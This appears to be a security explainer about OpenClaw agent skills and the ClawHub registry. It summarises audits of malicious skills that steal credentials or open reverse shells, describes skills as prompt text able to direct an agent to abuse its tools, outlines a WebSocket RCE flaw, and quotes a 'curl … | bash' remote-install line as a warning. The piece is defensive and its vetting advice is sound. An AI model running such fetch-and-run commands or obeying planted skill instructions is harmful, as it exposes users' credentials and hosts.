Over 10 years we help companies reach their financial and branding goals. Engitech is a values-driven technology agency dedicated.

Gallery

Contacts

411 University St, Seattle, USA

engitech@oceanthemes.net

+1 -800-456-478-23

OpenClaw

OpenClaw Skills & ClawHub: How Extensions Work (and Why 12-36% Are Risky)

OpenClaw is an open-source AI agent platform whose extension system is both its strongest selling point and its most active attack surface. Skills teach the agent when and how to call tools. ClawHub is the community registry where those skills live. As of April 2026, audits from Koi Security, Bitdefender, and Snyk put the share of ClawHub skills containing vulnerabilities or outright malicious payloads somewhere between 12-36% -- the range depends on who counted and how. This piece walks through the architecture, what ClawHub actually is, the exact numbers each auditor reported, and how to vet a skill before installing.

Quick Verdict
ClawHub hosts 3,000 to 10,700 community skills depending on who is counting. Between 12-36% have vulnerabilities or malicious payloads. Vet every skill. Pin versions. Assume supply-chain risk until proven otherwise.

What Is a Skill in OpenClaw?

In OpenClaw's architecture, a skill is the guidance layer. Tools are what the agent can do -- execute shell commands, browse the web, read files, send messages. Skills are instructions that teach the agent when and how to reach for those tools. Mechanically, a skill is a SKILL.md file (plus optional scripts) injected into the model's system prompt when loaded.

Skills are distributed as npm packages. Installing a skill drops files into the OpenClaw workspace and registers it with the agent. The SKILL.md file is plain Markdown: title, description, step-by-step guidance for the model, and sometimes example prompts. There is no binary to execute and no fine-tuning -- the skill changes behavior purely by rewriting the prompt context.

What this means for threat modeling: A skill cannot do anything a tool cannot already do. If your config grants the agent exec, browser, or filesystem permissions, a skill can instruct the agent to abuse them. The skill is a social-engineering layer directed at the model. Permissions still live in config files, not skill files.

3K-10.7K
ClawHub Skills (range)
Clarifai / Skywork / ClaudeFast, Mar 2026
Range spans community-only to total-with-forks -- no shared registry.
53
Official Vetted Skills
Skywork, Mar 24 2026
12-36%
Malicious or Vulnerable
Koi Security / Bitdefender / Snyk
1 week
Min GitHub Account Age to Publish
ClawHub publisher policy

Tools vs Skills vs Plugins -- The Three Layers

OpenClaw's extension system has three distinct layers. Confusing them is the first mistake most readers make.

Layer 1 / Action
Tools
Typed functions the agent invokes directly. Shipped with OpenClaw or added by plugins. These are the things that actually do something.
exec, browser, web_search, read, apply_patch, message, canvas, nodes, cron, image, sessions_*
Layer 2 / Guidance
Skills
SKILL.md files injected into the system prompt. They instruct the model on when and how to use existing tools. They grant no new capabilities on their own.
SKILL.md + optional prompts and scripts
Layer 3 / Packaging
Plugins
Installable npm packages that bundle tools, skills, model providers, and messaging channels into a single distributable unit.
npm install @clawhub/whatsapp-agent

A practical example: the WhatsApp plugin ships a tool (send_message), a skill (when to respond, how to thread conversations), a model provider, and a channel integration. Uninstall the plugin and all four go away together.

For the rest of this article, "skill" refers to the SKILL.md package on ClawHub; "plugin" refers to the full bundle. The two terms get conflated in community discussions, but the security risks differ: a plugin can add new tools (expanding the attack surface), while a skill can only rewrite the prompt (expanding the instruction surface). Both matter.


What Is ClawHub?

ClawHub is the community marketplace for OpenClaw skills and plugins. It is the closest analogue to npm, VS Code's Marketplace, or a browser extension store. Publishers upload packages; users openclaw install them.

The trust model is where the problem begins. Three characteristics define ClawHub's current posture:

  • Publisher barrier: a GitHub account at least one week old. That is the entire bar. No identity verification, no prior-work check, no paid-account requirement.
  • No mandatory code review. Submissions are published on upload. There is no human reviewer, no committee, no staged rollout.
  • No package signing. Users have no cryptographic way to verify that the package they install is the one the publisher wrote.

VirusTotal scanning was added in February 2026, but only for new submissions. Older skills -- the ones that accumulated installs during 2025 and early 2026 -- were not re-scanned retroactively. That means a skill published in December 2025 that passed popularity thresholds before VirusTotal integration may still be sitting on ClawHub without ever being scanned.

Compare that to mature package registries. npm has a well-documented malware problem of its own, but it also has organizational verification for high-profile publishers, 2FA requirements for popular maintainers, and a security advisory database. ClawHub, in April 2026, has none of those.


3K–10.7K
Skills on ClawHub depending on the auditor. Pick the range, not the number -- the disagreement itself is the story.

The Skill Count Problem -- Why Numbers Disagree

Three separate market trackers published ClawHub skill counts in March 2026. None of them agreed -- the gap is a 3.5x spread. Any article, vendor pitch, or investor deck citing "X skills on ClawHub" is usually citing one number out of three and presenting it as ground truth.

Source Date Reported Count Likely Scope
Clarifai Mar 6, 2026 10,700 Total including forks, renames, deprecated
Skywork Mar 24, 2026 3,000 community + 53 official Active community skills excluding duplicates
ClaudeFast Mar 27, 2026 5,700+ Community-built skills, unspecified filtering

The honest framing: 3,000 to 10,700 skills depending on source and counting method, with roughly 53 marked as official. As of late March 2026, ClaudeFast reports 5,700 or more community-built skills alongside those 53 official ones. If you need one number for a slide, pick 5,700 -- but keep the error bars.

Why does this matter for security? Because rates -- "12% are malicious" -- depend on the denominator. Koi Security audited 2,857 skills. Bitdefender's ~20% is against total, but which total? Snyk's ToxicSkills project found 1,467 vulnerable skills out of an unspecified base. The next section walks through each.


The Malicious Skills Problem

Three independent audits plus one publisher-concentration finding have put numbers on the malicious-skill rate. They used different samples, different definitions of "malicious" versus "vulnerable," and different detection methods. Each deserves its own row, because picking one favorite figure to quote misrepresents the full picture.

Koi Security -- 12% of 2,857 audited (341 malicious)
Koi's "ClawHavoc" investigation audited 2,857 skills and flagged 341 as malicious. The campaign distributed Atomic Stealer (AMOS), a macOS credential grabber, via typo-squatted packages such as solana-wallet-tracker and youtube-summarize-pro. Koi's definition of "malicious" required an active credential-exfiltration or reverse-shell payload, not just a risky permission.
Bitdefender -- ~20% of total (~900 malicious)
Bitdefender's sweep reported ~20% of ClawHub skills as malicious (approximately 900 packages). Their case study: a fake Polymarket trading bot that opened a reverse shell on the host, giving the attacker live terminal access rather than a one-shot credential theft. Bitdefender's rate appears higher than Koi's because they scored a broader set of behaviors as "malicious," including persistent network callbacks and suspicious outbound DNS.
Snyk ToxicSkills -- 36% have security flaws (1,467 vulnerable, 76 confirmed malicious)
Snyk's ToxicSkills project produced the highest headline rate: 36% of audited skills contained security flaws. Their count splits into 1,467 skills with exploitable vulnerabilities (injection, unsafe deserialization, weak secret handling) and 76 with confirmed malicious payloads. The gap between Snyk and Koi is mostly definitional: Snyk counts vulnerabilities; Koi counts active payloads. The Snyk number is the upper bound of what you should expect to encounter.
Single-publisher concentration -- "hightower6eu" uploaded 314+ malicious skillsConcentration finding
A single publisher account, hightower6eu, was found to have uploaded 314+ skills containing malicious payloads. That one account is responsible for a meaningful slice of the overall count. ClawHub's week-old-GitHub-account barrier does nothing to prevent a single actor from cycling through fresh accounts -- or simply using one account at scale.

The honest one-line summary: between 12-36% of ClawHub skills contain vulnerabilities or malicious payloads depending on audit methodology. Koi's 12% is the rate for active, confirmed payloads. Snyk's 36% includes exploitable but not-yet-weaponized flaws. Neither is the "right" number in isolation.


How Malware Reaches You

Three vectors recur across the Koi, Bitdefender, and Snyk reports. They are not novel to ClawHub -- they are the same software supply-chain patterns security teams have been tracking in npm, PyPI, and VS Code Marketplace since 2021. ClawHub's contribution is extending them to AI agents that already hold tool permissions.

1. Credential stealers targeting ~/.openclaw/

By default, OpenClaw stores API keys, OAuth tokens, and messaging credentials as plaintext under ~/.openclaw/. That directory is a named target in RedLine, Lumma, and Atomic Stealer (AMOS) distribution chains. A malicious skill does not need to open a connection; it just needs to execute once, grep the credentials directory, and exfiltrate. The Koi "ClawHavoc" campaign used exactly this pattern.

2. curl | bash install scripts

Many ClawHub skills include installation prerequisites in their documentation. A common shortcut is curl https://example.com/install.sh | bash. That single line bypasses every ClawHub scanning layer -- even if VirusTotal scanned the npm package, the post-install script pulls fresh code from the publisher's server at install time. The scanner cannot see what the user will run.

3. WebSocket exploitation

OpenClaw's Gateway runs a WebSocket server on port 18789. In February 2026, CVE-2026-25253 (CVSS 8.8) patched a one-click RCE via a WebSocket origin-header bypass: a malicious webpage could trick the control UI into trusting an attacker-supplied gateway URL, exfiltrating the auth token and executing arbitrary commands. 30,000 to 135,000 instances (per Censys and follow-on reports) were estimated exposed at disclosure; more than 50,000 were directly vulnerable to RCE. A March 2026 follow-up (fixed in v2026.2.25) patched a localhost-trust flaw where JavaScript in a browser could brute-force the gateway password. Skills can direct the agent to interact with gateways -- which means a malicious skill can abuse these primitives even on patched systems if the operator has not bound the gateway to loopback.

The core issue: OpenClaw exposes 0.0.0.0:18789 by default rather than binding to loopback. Every hardening guide for the past two releases starts with "change the bind address." Many users never do.


How to Vet a Skill Before Installing

Assume every unvetted ClawHub skill is hostile until the opposite is demonstrated. The work is manual and tedious -- there is no automated tool in April 2026 that replaces reading source. The checklist below is the minimum bar for anything touching real credentials.

Pre-install vetting checklist
  • Read the SKILL.md source on GitHub. Do not trust the ClawHub landing page. Open the repository the package links to and read the actual SKILL.md file plus every shell script the install references.
  • Check publisher age and prior skills. A week-old account with one skill is a signal. Look for publishers with a multi-month track record and prior skills that received real community review.
  • Pin exact versions. Never install with @latest. Pin to the exact version you reviewed. A maintainer takeover or credential compromise can push a malicious update to an otherwise trusted skill.
  • Avoid curl | bash prerequisites. If the skill's documentation tells you to pipe a remote shell script into your shell, walk away. Install prerequisites manually from a source you trust.
  • Review exec, browser, and filesystem permissions. A summarizer skill should not need shell execution. A translation skill should not need browser control. Overbroad permission requests are the single clearest red flag.
  • Separate personal and company workspaces. Use distinct ~/.openclaw/ directories, distinct API keys, and distinct OS users. A compromised personal skill should not be able to touch production credentials.
  • Run in a sandbox first. NanoClaw provides mandatory container isolation. Install the skill in a throwaway NanoClaw container, observe behavior for several sessions, then consider promoting it to your main OpenClaw environment.
  • Monitor outbound WebSockets after install. Unexpected WebSocket connections post-install are the signature of CVE-2026-25253-style exploitation. A simple lsof -i on macOS and Linux or Resource Monitor on Windows will flag new listeners.

None of this is OpenClaw-specific -- it is the same workflow engineers already apply to VS Code extensions and browser plugins. The only thing new is that OpenClaw skills inherit full agent permissions the moment they load.


Official Skills vs Community Skills

Skywork's March 24, 2026 count distinguishes 3,000 community skills from 53 official skills. That 53 is the number that matters for teams that want to minimize review overhead.

Official skills are published by the OpenClaw maintainers (now, after Peter Steinberger's move to OpenAI on February 14, 2026, the transitional open-source foundation backing the project). They cover core integrations -- major messaging channels, canonical model providers, common filesystem and shell workflows -- are reviewed, and are versioned against every release. They still should not be trusted blindly, but the baseline risk is lower.

Community skills are vet-yourself. The audits in the previous section apply to this 3,000-plus-skill population. Some are excellent, actively maintained, and extensively reviewed; some were uploaded by a week-old account yesterday. ClawHub does not visually distinguish between the two outside of the "official" badge.

Practical default: if an official skill exists for what you need, use it. Only reach into community skills when the official lineup does not cover the use case, and budget review time accordingly.


When to Use OpenClaw Skills vs Alternatives

OpenClaw is not the only agent runtime built around this architecture. Three sibling projects share the SKILL.md model with different security postures and target environments. If your use case fits one of their profiles, you get better defaults without giving up the skill ecosystem.

Container isolation
NanoClaw
Approximately 700 lines of TypeScript (versus OpenClaw's 430K plus) with mandatory container isolation. The security champion of the family. Use it as the sandbox for vetting untrusted ClawHub skills before promoting them to OpenClaw.
Enterprise policy
NemoClaw
NVIDIA's enterprise wrapper, released in early preview on March 16, 2026. OpenShell runtime enforces Landlock and seccomp. Network egress governed by policy-as-code. Managed inference routing. Use it when corporate policy requires documented egress controls.
Edge / IoT
ZeroClaw
Rust reimplementation. 3.4 MB binary. Sub-10ms cold boot. Under 5 MB of RAM. Use it for edge and IoT deployments where OpenClaw's 500 MB base and roughly 2,500 ms cold boot are disqualifying.

The broader ecosystem also includes O-Mega AI ($25,000/year managed SaaS with a no-code dashboard), and the cross-category alternatives -- Claude Code for pure coding, AutoGPT and CrewAI for framework-style orchestration.


Before You Use AI
Your Privacy

OpenClaw runs on your own infrastructure, but it talks to external model APIs for reasoning. Credentials live under ~/.openclaw/ in plaintext by default -- rotate that to an external secrets manager (v2026.2.26 or later) before running anything with production keys. Commercial API data-handling policies apply for whichever provider you point the agent at. Enterprise and business plans from Anthropic, OpenAI, and Google generally exclude API traffic from training; free and consumer tiers may not.

Mental Health & AI Dependency

Triaging a potential supply-chain compromise is high-stress work. Take breaks. Do not let an agent's confidence substitute for your own review. If you or a teammate is in crisis:

  • 988 Suicide & Crisis Lifeline -- Call or text 988 (US)
  • SAMHSA Helpline -- 1-800-662-4357
  • Crisis Text Line -- Text HOME to 741741
Your Rights & Our Transparency

Under GDPR and CCPA, you have the right to access, correct, and delete your personal data. Tech Jacks Solutions maintains editorial independence from all vendors discussed -- OpenClaw maintainers, NVIDIA, Anthropic, OpenAI, Koi Security, Bitdefender, and Snyk. This article was not sponsored, reviewed, or approved by any of them. We do not receive affiliate commissions from OpenClaw deployments. Claims are based on primary documentation (OpenClaw docs, CVE disclosures) and published third-party audits.